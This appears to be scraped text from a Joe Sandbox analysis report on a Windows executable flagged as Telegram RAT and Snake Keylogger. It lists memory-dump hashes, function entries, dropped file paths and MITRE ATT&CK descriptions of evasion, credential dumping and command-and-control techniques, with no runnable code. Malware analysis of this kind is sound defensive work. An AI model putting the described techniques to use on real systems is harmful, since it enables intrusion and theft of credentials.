Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35c4ecbd28e8a36f63fef39945dd53bc3cc2e3ba7bf5661beb9d406ad207c4a2
Instruction ID: 2a495e1c1f75e9deb7f55dd452006bd5039723f4486dd3a2d33fef27c5c0d053
Opcode Fuzzy Hash: 35c4ecbd28e8a36f63fef39945dd53bc3cc2e3ba7bf5661beb9d406ad207c4a2
Instruction Fuzzy Hash: C33122B9C093889FCB12CFA8D980ADEBFF4AF4A220F15909AD444BB351C3349905CF65

Function 064CA540 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b9d51e60467dada3682e91dde95eff4b66c63499594391e7f6a79f701758b18
Instruction ID: 8cdcd5a321d8b5d72a7cc5b4e9f4632d83d237895002d082620fc6410b78873e
Opcode Fuzzy Hash: 2b9d51e60467dada3682e91dde95eff4b66c63499594391e7f6a79f701758b18
Instruction Fuzzy Hash: 6A219AB9D052089FCB10CFA9D984ADEFBF4EB49320F14905AE818B7310C735A945CFA5

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report .05.2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\.05.2024.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xusvxm1.sgs.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hiw2simt.mfn.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hj0k2r1s.ffs.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ombvvhhf.taa.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
.05.2024.exe

Function 007DB240 Relevance: 1.7, APIs: 1, Instructions: 207
COMMON

Function 007D5CFC Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Function 007D4854 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 007DD720 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Function 007DCFF8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 007DB440 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 064D99A8 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Function 064DCE20 Relevance: 1.6, APIs: 1, Instructions: 100
libraryCOMMON

Function 064C3008 Relevance: .7, Instructions: 745
COMMON

Function 064D0B30 Relevance: .7, Instructions: 709
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre